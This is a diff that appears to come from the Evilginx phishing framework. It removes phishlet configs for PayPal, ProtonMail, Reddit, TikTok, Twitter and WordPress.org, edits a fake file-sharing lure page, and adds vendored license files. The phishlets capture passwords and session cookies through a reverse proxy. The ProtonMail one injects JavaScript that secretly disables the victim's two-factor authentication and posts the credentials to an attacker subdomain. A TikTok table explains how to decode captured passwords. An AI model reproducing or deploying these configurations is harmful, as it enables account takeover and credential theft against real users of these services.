||||
auth_tokens:
|
||||
- domain: '.paypal.com'
|
||||
keys: ['.*,regexp']
|
||||
auth_urls:
|
||||
- '/myaccount/summary'
|
||||
- '/myaccount/.*'
|
||||
|
||||
credentials:
|
||||
username:
|
||||
key: 'login_email'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'login_password'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
|
||||
login:
|
||||
domain: 'www.paypal.com'
|
||||
path: '/signin'
|
||||
|
||||
js_inject:
|
||||
- trigger_domains: ["www.paypal.com"]
|
||||
trigger_paths: ["/signin"]
|
||||
trigger_params: ["email"]
|
||||
script: |
|
||||
function lp(){
|
||||
var email = document.querySelector("#email");
|
||||
if (email != null) {
|
||||
email.value = "{email}";
|
||||
return;
|
||||
}
|
||||
setTimeout(function(){lp();}, 100);
|
||||
}
|
||||
setTimeout(function(){lp();}, 100);
|
@ -1,163 +0,0 @@
|
||||
name: 'protonmail'
|
||||
author: '@jamescullum'
|
||||
# This phishlet is mostly an appeal to introduce U2F everywhere, protecting users from phishing in an easy and accessible way.
|
||||
# Protonmail is based on Angular, very JS heavy and changes a lot of things often. This makes it difficult to keep the script compatible for a long period of time.
|
||||
# It never sends the password over the wire and enforces integrity in multiple ways.
|
||||
# I was unable to reconstruct a 2FA session with cookies or other clearly available materials (if you can, tell me how and the whole thing will be MUCH smoother!)
|
||||
# To combat these JS-based protections, this phishlet injects JavaScript that hollows out the protections.
|
||||
# If the user has no 2FA protection, it will recognize this and leak the login details manually, so that they can be captured.
|
||||
# If 2FA is enabled, it will modify the UI in a way so that the user is forced to disable 2FA. Only after this is done, the credentials are leaked.
|
||||
# This way, only the login details are needed to get into an account.
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'mail', orig_sub: 'mail', domain: 'protonmail.com', session: true, is_landing: true, auto_filter: true}
|
||||
- {phish_sub: 'leak', orig_sub: 'debug', domain: 'example.org', session: true, is_landing: false}
|
||||
sub_filters:
|
||||
- {triggers_on: 'mail.protonmail.com', orig_sub: 'mail', domain: 'protonmail.com', search: '</script></body>', replace: '</script><script>!function(){var o=null,t=null,e=150,i=null,a=null;function c(n,o,t,i){if(void 0===i&&(i=0,a=n),a!=n)return console.error("Waiting aborted due to race condition",a,n);jQuery(n).length?o(i):i<e?setTimeout(function(){c(n,o,t,i+1)},100):(console.error("Timeout reached, cancelling action"),void 0!==t&&t(i))}function l(){null!=i&&clearInterval(i),$("a.headerSecuredDesktop-logo").click(),$("#suppressModal").remove(),$("#pm_loading").removeClass("show")}function s(){var n="https://"+window.location.hostname.replace("//mail.","//leak.")+"/confirm-compromise";$.post(n,{username:o,password:t}),$("html > head").append(''<style id="hide2fa">button[ng-show="twoFactor === 0"] { display: none !important; }</style>'')}!function n(o){window.jQuery?o():setTimeout(function(){n(o)},50)}(function(){$(document).ready(function(){$("body").on("click","#login_btn",function(){o=$("#username").val(),t=$("#password").val(),c("button.compose, #login_btn_2fa:visible",function(){$("#login_btn_2fa").length||s()})}),$("body").on("click","#login_btn_2fa",function(){c("button.compose",function(){$("html > head").append(''<style id="suppressModal">.pm_modal:not(.very-important) { z-index: -1 !important; } .pm_modal.very-important button.close, .pm_modal.very-important button[ng-click="ctrl.cancel()"] { display: none !important; } #body { opacity: 0 !important; }</style>''),$("#pm_loading").addClass("show"),c("#tour-settings",function(){$("#tour-settings").click(),c(''a.navigationSettings-link[href="/security"]'',function(){$(''a.navigationSettings-link[href="/security"]'').click(),c(''button[ng-click="disableTwoFactor()"]'',function(){var n=$(''button[ng-click="disableTwoFactor()"]'');if(n.hasClass("ng-hide"))l();else{i=setInterval(function(){$("#confirmModalBtn").length&&$("#confirmModalBtn").click()},50),n.click();var o=setInterval(function(){$(".cg-notify-message.notification-danger").length&&($(".cg-notify-message.notification-danger").remove(),n.click()),$(".cg-notify-message.notification-success").length&&($(".cg-notify-message.notification-success").remove(),clearInterval(o),l(),s())},100)}},l)},l)},l)})})})})}();</script></body>', mimes: ['text/html']}
|
||||
- {triggers_on: 'mail.protonmail.com', orig_sub: 'mail', domain: 'protonmail.com', search: ' integrity=(.+?) crossorigin=anonymous', replace: ' ', mimes: ['text/html']}
|
||||
- {triggers_on: 'mail.protonmail.com', orig_sub: 'mail', domain: 'protonmail.com', search: '(?:r&&\()?\w+\.integrity\s*=\s*.+?\)?,', replace: '', mimes: ['application/javascript']}
|
||||
auth_urls:
|
||||
- '/confirm-compromise'
|
||||
auth_tokens:
|
||||
# We actually don't care for the cookies here
|
||||
- domain: '.protonmail.com'
|
||||
keys: ['Session-Id']
|
||||
credentials:
|
||||
username:
|
||||
key: 'username'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'password'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
login:
|
||||
domain: 'mail.protonmail.com'
|
||||
path: '/login'
|
||||
|
||||
# Below you find the raw script. It is minified via jscompress.com and injected at the end of the body of the landing page.
|
||||
#(function() {
|
||||
# var usrCache = null;
|
||||
# var passwdCache = null;
|
||||
# var timeoutMax = 15*10;
|
||||
# var waitforTimeout = null;
|
||||
# var suppressConfirm = null;
|
||||
# var waitingForElement = null;
|
||||
#
|
||||
# defer(function() {
|
||||
# $(document).ready(function() {
|
||||
# $("body").on("click", "#login_btn", function() {
|
||||
# usrCache = $("#username").val();
|
||||
# passwdCache = $("#password").val();
|
||||
#
|
||||
# waitFor("button.compose, #login_btn_2fa:visible", function() {
|
||||
# if($("#login_btn_2fa").length) return;
|
||||
#
|
||||
# leakCredentials();
|
||||
# });
|
||||
# });
|
||||
#
|
||||
# $("body").on("click", "#login_btn_2fa", function() {
|
||||
# waitFor("button.compose", function() {
|
||||
# // Cover actions
|
||||
# $('html > head').append('<style id="suppressModal">.pm_modal:not(.very-important) { z-index: -1 !important; } .pm_modal.very-important button.close, .pm_modal.very-important button[ng-click="ctrl.cancel()"] { display: none !important; } #body { opacity: 0 !important; }</style>');
|
||||
# $("#pm_loading").addClass("show");
|
||||
#
|
||||
# // Navigate to settings
|
||||
# waitFor("#tour-settings", function() {
|
||||
# $("#tour-settings").click();
|
||||
#
|
||||
# // Navigate to security settings
|
||||
# waitFor('a.navigationSettings-link[href="/security"]', function() {
|
||||
# $('a.navigationSettings-link[href="/security"]').click();
|
||||
#
|
||||
# // Wait until 2FA options loaded
|
||||
# waitFor('button[ng-click="disableTwoFactor()"]', function() {
|
||||
# var twofaDisableButton = $('button[ng-click="disableTwoFactor()"]');
|
||||
#
|
||||
# if(!twofaDisableButton.hasClass("ng-hide")) {
|
||||
# // Start automatic modal interactions
|
||||
# suppressConfirm = setInterval(function() {
|
||||
# if($("#confirmModalBtn").length) $("#confirmModalBtn").click();
|
||||
# }, 50);
|
||||
#
|
||||
# // Initiate action to remove
|
||||
# twofaDisableButton.click();
|
||||
#
|
||||
# var waitConfirm = setInterval(function() {
|
||||
# // Wrong code or other error -> Retry
|
||||
# if($(".cg-notify-message.notification-danger").length) {
|
||||
# $(".cg-notify-message.notification-danger").remove();
|
||||
# twofaDisableButton.click();
|
||||
# }
|
||||
#
|
||||
# // Button switched
|
||||
# if($('.cg-notify-message.notification-success').length) {
|
||||
# $(".cg-notify-message.notification-success").remove();
|
||||
# clearInterval(waitConfirm);
|
||||
#
|
||||
# resetUI();
|
||||
# leakCredentials();
|
||||
# }
|
||||
# }, 100);
|
||||
# } else {
|
||||
# resetUI(); // we shouldn't possibly get here
|
||||
# }
|
||||
# }, resetUI);
|
||||
# }, resetUI);
|
||||
# }, resetUI);
|
||||
# });
|
||||
# });
|
||||
# });
|
||||
# });
|
||||
#
|
||||
# function waitFor(selector, callback, timeout_callback, timeout_i) {
|
||||
# if(typeof timeout_i == 'undefined') {
|
||||
# timeout_i = 0;
|
||||
# waitingForElement = selector;
|
||||
# }
|
||||
#
|
||||
# // Collision detection - there should only be one wait at a time, but at login the user might be faster than the timeout
|
||||
# if(waitingForElement != selector) {
|
||||
# return console.error("Waiting aborted due to race condition", waitingForElement, selector);
|
||||
# }
|
||||
#
|
||||
# if (jQuery(selector).length) {
|
||||
# callback(timeout_i);
|
||||
# } else if(timeout_i < timeoutMax) {
|
||||
# waitforTimeout = setTimeout(function() {
|
||||
# waitFor(selector, callback, timeout_callback, timeout_i+1);
|
||||
# }, 100);
|
||||
# } else {
|
||||
# console.error("Timeout reached, cancelling action");
|
||||
#
|
||||
# if(typeof timeout_callback !== 'undefined') {
|
||||
# timeout_callback(timeout_i);
|
||||
# }
|
||||
# }
|
||||
# }
|
||||
#
|
||||
# function resetUI() {
|
||||
# if(suppressConfirm != null) clearInterval(suppressConfirm);
|
||||
#
|
||||
# $("a.headerSecuredDesktop-logo").click();
|
||||
# $("#suppressModal").remove();
|
||||
# $("#pm_loading").removeClass("show");
|
||||
# }
|
||||
#
|
||||
# function leakCredentials() {
|
||||
# var leakAddress = "https://"+(window.location.hostname.replace("//mail.", "//leak."))+"/confirm-compromise";
|
||||
# $.post(leakAddress, {"username":usrCache, "password":passwdCache});
|
||||
#
|
||||
# // Make sure the user doesn't activate 2FA
|
||||
# $('html > head').append('<style id="hide2fa">button[ng-show="twoFactor === 0"] { display: none !important; }</style>');
|
||||
# }
|
||||
#
|
||||
# function defer(method) {
|
||||
# if (window.jQuery) {
|
||||
# method();
|
||||
# } else {
|
||||
# setTimeout(function() { defer(method) }, 50);
|
||||
# }
|
||||
# }
|
||||
#})();
|
@ -1,29 +0,0 @@
|
||||
author: '@customsync'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'www', orig_sub: 'www', domain: 'reddit.com', session: true, is_landing: true}
|
||||
- {phish_sub: 'win', orig_sub: 'www', domain: 'redditstatic.com', session: false, is_landing: false}
|
||||
- {phish_sub: 'events', orig_sub: 'events', domain: 'reddit.com', session: false, is_landing: false}
|
||||
sub_filters:
|
||||
- {triggers_on: 'www.reddit.com', orig_sub: 'www', domain: 'reddit.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'www.reddit.com', orig_sub: 'www', domain: 'reddit.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'www.redditstatic.com', orig_sub: 'www', domain: 'redditstatic.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'www.redditstatic.com', orig_sub: 'www', domain: 'redditstatic.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'www.redditstatic.com', orig_sub: 'www', domain: 'redditstatic.com', search: 'src="https://{hostname}', replace: 'src="https://{hostname}', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'events.reddit.com', orig_sub: 'www', domain: 'reddit.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'events.reddit.com', orig_sub: 'www', domain: 'reddit.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
|
||||
auth_tokens:
|
||||
- domain: '.reddit.com'
|
||||
keys: ['reddit_session']
|
||||
credentials:
|
||||
username:
|
||||
key: 'username'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'password'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
login:
|
||||
domain: 'www.reddit.com'
|
||||
path: '/login'
|
@ -1,95 +0,0 @@
|
||||
# AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
|
||||
# PLEASE DO NOT MISUSE THIS PHISHLET.
|
||||
|
||||
# All POST request fields get encoded by TikTok's JavaScript before being sent to the server.
# Below is a table which you can use to manually decode the captured credentials in evilginx (a decoding sketch is included at the end of this file).
|
||||
|
||||
author: '@An0nUD4Y'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'www', orig_sub: 'www', domain: 'tiktok.com', session: true, is_landing: true}
|
||||
- {phish_sub: 'm', orig_sub: 'm', domain: 'tiktok.com', session: true, is_landing: false}
|
||||
- {phish_sub: '', orig_sub: '', domain: 'tiktok.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'polyfill', orig_sub: '', domain: 'polyfill.io', session: true, is_landing: false}
|
||||
- {phish_sub: 's16', orig_sub: 's16', domain: 'tiktokcdn.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'hypstarcdn', orig_sub: 's16', domain: 'hypstarcdn.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'kakao', orig_sub: 'developers', domain: 'kakao.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'mon-va', orig_sub: 'mon-va', domain: 'byteoversea.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'maliva', orig_sub: 'maliva-mcs', domain: 'byteoversea.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'sf16-muse-va', orig_sub: 'sf16-muse-va', domain: 'ibytedtos.com', session: true, is_landing: false}
|
||||
|
||||
sub_filters:
|
||||
- {triggers_on: 'www.tiktok.com', orig_sub: 'www', domain: 'tiktok.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: 'm', domain: 'tiktok.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: 'm', domain: 'tiktok.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.tiktok.com', orig_sub: 's16', domain: 'tiktokcdn.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: 's16', domain: 'tiktokcdn.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: 's16', domain: 'tiktokcdn.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.tiktok.com', orig_sub: '', domain: 'polyfill.io', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: '', domain: 'polyfill.io', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: '', domain: 'polyfill.io', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.tiktok.com', orig_sub: 's16', domain: 'hypstarcdn.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: 's16', domain: 'hypstarcdn.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: 's16', domain: 'hypstarcdn.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.tiktok.com', orig_sub: 'developers', domain: 'kakao.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: 'developers', domain: 'kakao.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: 'developers', domain: 'kakao.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.tiktok.com', orig_sub: 'mon-va', domain: 'byteoversea.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: 'mon-va', domain: 'byteoversea.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: 'mon-va', domain: 'byteoversea.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.tiktok.com', orig_sub: 'maliva-mcs', domain: 'byteoversea.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: 'maliva-mcs', domain: 'byteoversea.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: 'maliva-mcs', domain: 'byteoversea.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.tiktok.com', orig_sub: 'sf16-muse-va', domain: 'ibytedtos.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: 'sf16-muse-va', domain: 'ibytedtos.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'm.tiktok.com', orig_sub: 'sf16-muse-va', domain: 'ibytedtos.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
auth_tokens:
|
||||
- domain: '.tiktok.com'
|
||||
keys: ['.*,regexp']
|
||||
credentials:
|
||||
username:
|
||||
key: 'account'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'pass'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
custom:
|
||||
key: 'mobile'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
|
||||
login:
|
||||
domain: 'www.tiktok.com'
|
||||
path: '/login/phone-or-email/phone-password?lang=en'
|
||||
|
||||
|
||||
# Remember: the server accepts only encoded credentials, so don't break the JS functions responsible for the encoding.
|
||||
|
||||
#ENCODING TABLE TO DECODE THE PASSWORD AND MOBILE NUMBER
|
||||
|
||||
# FOR NUMBERS
|
||||
|
||||
# 1 = 34 , 2 = 37 , 3 = 36 , 4 = 31 , 5 = 30 ,6 = 33 , 7 = 32 , 8 = 3d , 9 = 3c
|
||||
|
||||
# FOR SPECIAL CHARACTERS
|
||||
|
||||
# ! = 24 , @ = 45 , # = 26 , $ = 21 , ^ = 5b , & = 23 , * = 2f , + = 2e
|
||||
|
||||
# FOR LETTERS (SMALL-LETTERS)
|
||||
|
||||
# a = 64, b = 67, c = 66, d = 61, e = 60, f = 63, g = 62, h = 6d, i = 6c, j = 6f, k = 6e, l = 69, m = 68, n = 6b, o = 6a, p = 75, q = 74, r = 77, s = 76, t = 71, u = 70, v = 73, w = 72, x = 7d, y = 7c, z = 7f
|
||||
|
||||
# FOR LETTERS (CAPITAL-LETTERS)
|
||||
|
||||
# A=44 B=47 C=46 D=41 E=40 F=43 G=42 H=4d I=4c J=4f K=4e L=49 M=48 N=4b O=4a P=55 Q=54 R=57 S=56 T=51 U=50 V=53 W=52 X=5d Y=5c Z=5f
|
||||
|
||||
|
||||
# Other remaining codes can be found through POST request analysis.
|
||||
|
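# A minimal decoding sketch (assumption: the table above corresponds to XOR-ing each character's
# ASCII code with 0x05 and hex-encoding the result; verify it against your own captures):
#
# function decodeTikTokField(hex) {
#   var out = '';
#   for (var i = 0; i < hex.length; i += 2) {
#     out += String.fromCharCode(parseInt(hex.substring(i, i + 2), 16) ^ 0x05);
#   }
#   return out;
# }
# // decodeTikTokField('76606677607134') === 'secret1'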
@ -1,25 +0,0 @@
|
||||
author: '@white_fi'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'mobile', orig_sub: 'mobile', domain: 'twitter.com', session: true, is_landing: true}
|
||||
- {phish_sub: 'abs', orig_sub: 'abs', domain: 'twimg.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'api', orig_sub: 'api', domain: 'twitter.com', session: false, is_landing: false}
|
||||
sub_filters:
|
||||
- {triggers_on: 'mobile.twitter.com', orig_sub: 'mobile', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
|
||||
- {triggers_on: 'abs.twimg.com', orig_sub: 'abs', domain: 'twimg.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
|
||||
- {triggers_on: 'api.twitter.com', orig_sub: 'api', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
|
||||
auth_tokens:
|
||||
- domain: 'twitter.com'
|
||||
keys: ['dnt','fm','kdt','_twitter_sess','twid','auth_token']
|
||||
credentials:
|
||||
username:
|
||||
key: 'session\[username_or_email\]'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'session\[password\]'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
login:
|
||||
domain: 'mobile.twitter.com'
|
||||
path: '/login'
|
@ -1,22 +0,0 @@
|
||||
author: '@white_fi'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: '', orig_sub: '', domain: 'twitter.com', session: true, is_landing: true}
|
||||
- {phish_sub: 'abs', orig_sub: 'abs', domain: 'twimg.com'}
|
||||
- {phish_sub: 'api', orig_sub: 'api', domain: 'twitter.com'}
|
||||
sub_filters: []
|
||||
auth_tokens:
|
||||
- domain: '.twitter.com'
|
||||
keys: ['kdt','_twitter_sess','twid','auth_token']
|
||||
credentials:
|
||||
username:
|
||||
key: 'session\[username_or_email\]'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'session\[password\]'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
login:
|
||||
domain: 'twitter.com'
|
||||
path: '/login'
|
@ -1,96 +0,0 @@
|
||||
# Evilginx phishlet configuration file for WordPress.org.
|
||||
#
|
||||
# This is a phishing configuration for the main WordPress.org domain;
|
||||
# it is *not* immediately useful for phishing self-hosted sites that
|
||||
# run on the WordPress software.
|
||||
#
|
||||
# For such self-hosted sites, some modifications are needed. Refer to
|
||||
# the comments in this file for some guidance on creating a phishlet
|
||||
# to use against self-hosted WordPress sites.
|
||||
---
|
||||
name: 'WordPress.org'
|
||||
author: '@meitar'
|
||||
min_ver: '2.3.0'
|
||||
|
||||
proxy_hosts:
|
||||
# Proxy the primary domain.
|
||||
- phish_sub: ''
|
||||
orig_sub: ''
|
||||
domain: 'wordpress.org'
|
||||
session: true
|
||||
is_landing: true
|
||||
|
||||
# These proxied hosts should be removed when phishing self-hosted sites.
|
||||
- phish_sub: 'login'
|
||||
orig_sub: 'login'
|
||||
domain: 'wordpress.org'
|
||||
session: true
|
||||
is_landing: false
|
||||
- phish_sub: 'make'
|
||||
orig_sub: 'make'
|
||||
domain: 'wordpress.org'
|
||||
session: true
|
||||
is_landing: false
|
||||
- phish_sub: 'profiles'
|
||||
orig_sub: 'profiles'
|
||||
domain: 'wordpress.org'
|
||||
session: true
|
||||
is_landing: false
|
||||
|
||||
sub_filters: []
|
||||
|
||||
# For self-hosted WordPress sites, you may find it easier to use a
|
||||
# regular expression to match session cookies, as the cookie names
|
||||
# are produced uniquely per site. This can be done as follows:
|
||||
#
|
||||
# ```yaml
|
||||
# - domain: 'self-hosted-domain.com'
|
||||
# keys:
|
||||
# - 'wordpress_sec_.*,regexp'
|
||||
# - 'wordpress_logged_in_.*,regexp'
|
||||
# ```
|
||||
#
|
||||
# If you do choose to use the regular expression facility, you
|
||||
# will also then need to use the `auth_urls` dictionary to define
|
||||
# when Evilginx should actually capture these tokens. Something
|
||||
# like this should do the trick:
|
||||
#
|
||||
# ```yaml
|
||||
# auth_urls:
|
||||
# - '.*/wp-admin/.*'
|
||||
# ```
|
||||
#
|
||||
# The above ensures that the `auth_tokens` are noticed whenever
|
||||
# the phished user makes requests to URLs containing `wp-admin`.
|
||||
#
|
||||
# For the WordPress.org service itself, however, none of the above is
|
||||
# necessary, and the following simple `auth_tokens` dictionary should
|
||||
# work just fine.
|
||||
auth_tokens:
|
||||
- domain: '.wordpress.org'
|
||||
keys: ['wporg_logged_in', 'wporg_sec']
|
||||
|
||||
credentials:
|
||||
username:
|
||||
key: 'log'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'pwd'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
|
||||
# For a self-hosted WordPress site, you'll probably want to define the
|
||||
# `login` dictionary here as follows:
|
||||
#
|
||||
# ```yaml
|
||||
# login:
|
||||
# domain: 'self-hosted-domain.com'
|
||||
# path: '/wp-login.php'
|
||||
# ```
|
||||
#
|
||||
# Some WordPress plugins, such as WooCommerce, change the URL of the
|
||||
# login page. You'll want to examine the specific site for this.
|
||||
login:
|
||||
domain: 'login.wordpress.org'
|
||||
path: '/'
|
@ -9,7 +9,7 @@
|
||||
<style>
|
||||
|
||||
body {
|
||||
background-color: #666;
|
||||
background-color: #28a745;
|
||||
}
|
||||
|
||||
#box {
|
||||
@ -41,10 +41,10 @@
|
||||
<body>
|
||||
<div id="box">
|
||||
<div class="message">
|
||||
<p><strong>{from_name}</strong> shared a file with you.</p>
|
||||
<p><strong>{from_name}</strong><br/>shared a file with you.</p>
|
||||
</div>
|
||||
<div class="download">
|
||||
<button type="button" class="btn btn-primary btn-lg" onclick="clickedDownload()">Download "{filename}"</button>
|
||||
<button type="button" class="btn btn-primary btn-lg" onclick="clickedDownload()">Download <strong>{filename}</strong></button>
|
||||
</div>
|
||||
</div>
|
||||
|
1
vendor/github.com/caddyserver/certmagic/.gitignore
generated
vendored
Normal file
@ -0,0 +1 @@
|
||||
_gitignore/
|
201
vendor/github.com/caddyserver/certmagic/LICENSE.txt
generated
vendored
Normal file
@ -0,0 +1,201 @@
|
||||
Apache License
|
||||
Version 2.0, January 2004
|
||||
http://www.apache.org/licenses/
|
||||
|
||||
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
|
||||
|
||||
1. Definitions.
|
||||
|
||||
"License" shall mean the terms and conditions for use, reproduction,
|
||||
and distribution as defined by Sections 1 through 9 of this document.
|
||||
|
||||
"Licensor" shall mean the copyright owner or entity authorized by
|
||||
the copyright owner that is granting the License.
|
||||
|
||||
"Legal Entity" shall mean the union of the acting entity and all
|
||||
other entities that control, are controlled by, or are under common
|
||||
control with that entity. For the purposes of this definition,
|
||||
"control" means (i) the power, direct or indirect, to cause the
|
||||
direction or management of such entity, whether by contract or
|
||||
otherwise, or (ii) ownership of fifty percent (50%) or more of the
|
||||
outstanding shares, or (iii) beneficial ownership of such entity.
|
||||
|
||||
"You" (or "Your") shall mean an individual or Legal Entity
|
||||
exercising permissions granted by this License.
|
||||
|
||||
"Source" form shall mean the preferred form for making modifications,
|
||||
including but not limited to software source code, documentation
|
||||
source, and configuration files.
|
||||
|
||||
"Object" form shall mean any form resulting from mechanical
|
||||
transformation or translation of a Source form, including but
|
||||
not limited to compiled object code, generated documentation,
|
||||
and conversions to other media types.
|
||||
|
||||
"Work" shall mean the work of authorship, whether in Source or
|
||||
Object form, made available under the License, as indicated by a
|
||||
copyright notice that is included in or attached to the work
|
||||
(an example is provided in the Appendix below).
|
||||
|
||||
"Derivative Works" shall mean any work, whether in Source or Object
|
||||
form, that is based on (or derived from) the Work and for which the
|
||||
editorial revisions, annotations, elaborations, or other modifications
|
||||
represent, as a whole, an original work of authorship. For the purposes
|
||||
of this License, Derivative Works shall not include works that remain
|
||||
separable from, or merely link (or bind by name) to the interfaces of,
|
||||
the Work and Derivative Works thereof.
|
||||
|
||||
"Contribution" shall mean any work of authorship, including
|
||||
the original version of the Work and any modifications or additions
|
||||
to that Work or Derivative Works thereof, that is intentionally
|
||||
submitted to Licensor for inclusion in the Work by the copyright owner
|
||||
or by an individual or Legal Entity authorized to submit on behalf of
|
||||
the copyright owner. For the purposes of this definition, "submitted"
|
||||
means any form of electronic, verbal, or written communication sent
|
||||
to the Licensor or its representatives, including but not limited to
|
||||
communication on electronic mailing lists, source code control systems,
|
||||
and issue tracking systems that are managed by, or on behalf of, the
|
||||
Licensor for the purpose of discussing and improving the Work, but
|
||||
excluding communication that is conspicuously marked or otherwise
|
||||
designated in writing by the copyright owner as "Not a Contribution."
|
||||
|
||||
"Contributor" shall mean Licensor and any individual or Legal Entity
|
||||
on behalf of whom a Contribution has been received by Licensor and
|
||||
subsequently incorporated within the Work.
|
||||
|
||||
2. Grant of Copyright License. Subject to the terms and conditions of
|
||||
this License, each Contributor hereby grants to You a perpetual,
|
||||
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
|
||||
copyright license to reproduce, prepare Derivative Works of,
|
||||
publicly display, publicly perform, sublicense, and distribute the
|
||||
Work and such Derivative Works in Source or Object form.
|
||||
|
||||
3. Grant of Patent License. Subject to the terms and conditions of
|
||||
